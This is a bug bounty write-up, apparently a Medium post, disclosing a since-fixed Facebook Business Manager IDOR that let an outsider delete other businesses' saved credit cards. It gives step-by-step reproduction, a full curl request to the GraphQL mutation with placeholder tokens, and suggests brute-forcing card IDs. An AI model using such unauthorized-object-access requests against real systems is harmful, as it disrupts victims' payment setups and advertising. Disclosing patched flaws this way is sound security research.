[IDOR] Delete saved credit cards from any Business Manager Account — Facebook Bug Bounty

Rohit kumar
2 min readJun 5, 2020

Business manager is having an option to add and manage credit cards. However, this functionality is limited to authorized “Admins” of that particular Business.

In this report, I will demonstrate how it’s possible to delete saved credit cards, without having an admin or any role in that Victim’s Business.

Impact
===
Victim’s Business Operations could be affected, by any attacker by removing all saved credit cards, which will result in termination of all Ads run by Victim’s Business on facebook.

Setup
===
Users: USER A, USER B; USER A is Admin of “Business A”, USER B is Admin of “Business B”

Victim — “USER A & BUSINESS A”
Attacker — “USER B & Business B”

Description:

Add credit card from “USER A” account in “Business A” using this link — https://business.facebook.com/settings/payment-methods/?business_id=BUSINESS_ID

Steps
==
1. Now, from USER B account (USER B isn’t associated with BUSINESS A)
2. For performing this attack, you need a Business ID & CREDIT Card ID.
3. Send a POST request to https://business.facebook.com/api/graphql/ with these Variables {“biz_id”:”BUSINESS_ID_HERE”,”fs_id”:CREDIT_CARD_ID} on RemoveFundingSourceButtonV2CCMutation

For more information please have a look at this attached CURL Request.

curl ‘https://business.facebook.com/api/graphql/' -H ‘authority: business.facebook.com’ -H ‘origin: https://business.facebook.com/' -H ‘sec-fetch-dest: empty’ -H ‘user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.122 Safari/537.36’ -H ‘dnt: 1’ -H ‘content-type: application/x-www-form-urlencoded’ -H ‘accept: */*’ -H ‘sec-fetch-site: same-origin’ -H ‘sec-fetch-mode: cors’ -H ‘accept-language: en-GB,en-US;q=0.9,en;q=0.8’ -H ‘cookie: BROWSER_COOKIE_HERE’ — data ‘av=100005595064283&__user=100005595064283&__a=1&__dyn=DYN_TOKEN_HERE&__csr=&__req=p&__beoa=0&__pc=PHASED%3Abrands_pkg&dpr=1&__rev=1001776419&__s=veodst%3Auavjgo%3Avwvt5b&__hsi=6799248542192993611–0&__comet_req=0&fb_dtsg=FB_DTSG_TOKEN&jazoest=22122&__spin_r=1001776419&__spin_b=trunk&__spin_t=1583073414&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=RemoveFundingSourceButtonV2CCMutation&variables=%7B%22biz_id%22%3A%22BUSINESS_ID_HERE%22%2C%22fs_id%22%3ACREDIT_CARD_ID%7D&doc_id=2073258542777671’ — compressed

4. Run this request, and Credit card is removed from any Business!

How can we get the Business ID & Credit Card ID?
===
How to Get a Credit Card ID? — There are multiple ways to get Credit card id:

1. If you were the admin of Business A in the past and someone removed you from Business a — You can get this business ID from your browsing history of the Business manager. Generally, You can get Credit card ID from this URL -https://business.facebook.com/settings/payment-methods/CREDIT_CARD_ID?business_id=BUSINESS_ID

2. Another way is just Brute-force Credit Card ID.

Timeline:

Reported : 2 March 2020

Clarifications & Discussion: 4th March 2020 to 26th March 2020

Pre-Triaged & Triaged: 8 April 2020

Fixed: 14 April 2020

Bounty Issued: 16 April 2020

--

--

Rohit kumar

✌ Hacking & Security, Programming / Technology - Not all superheroes wear capes, some just push code to Github.